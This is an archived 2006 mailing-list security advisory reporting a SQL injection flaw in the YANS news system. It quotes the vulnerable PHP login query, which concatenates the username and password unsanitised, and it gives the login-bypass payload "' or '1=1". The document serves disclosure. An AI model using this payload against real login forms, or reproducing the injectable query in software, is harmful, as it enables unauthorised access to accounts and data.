 | ||||
| << Previous | INDEX | Search | src / Print | Next >> |
| ||||
| |||||||||||||||
Date: 8 Nov 2006 12:59:34 -0000
From: [email protected]
To: [email protected]
Subject: Y.A.N.S sql injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/
vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
simple sql injection
' or '1=1
' or '1=1
-navairum
| |||||||||||||||
|
Закладки на сайте Проследить за страницей |
Created 1996-2025 by Maxim Chirkov Добавить, Поддержать, Вебмастеру |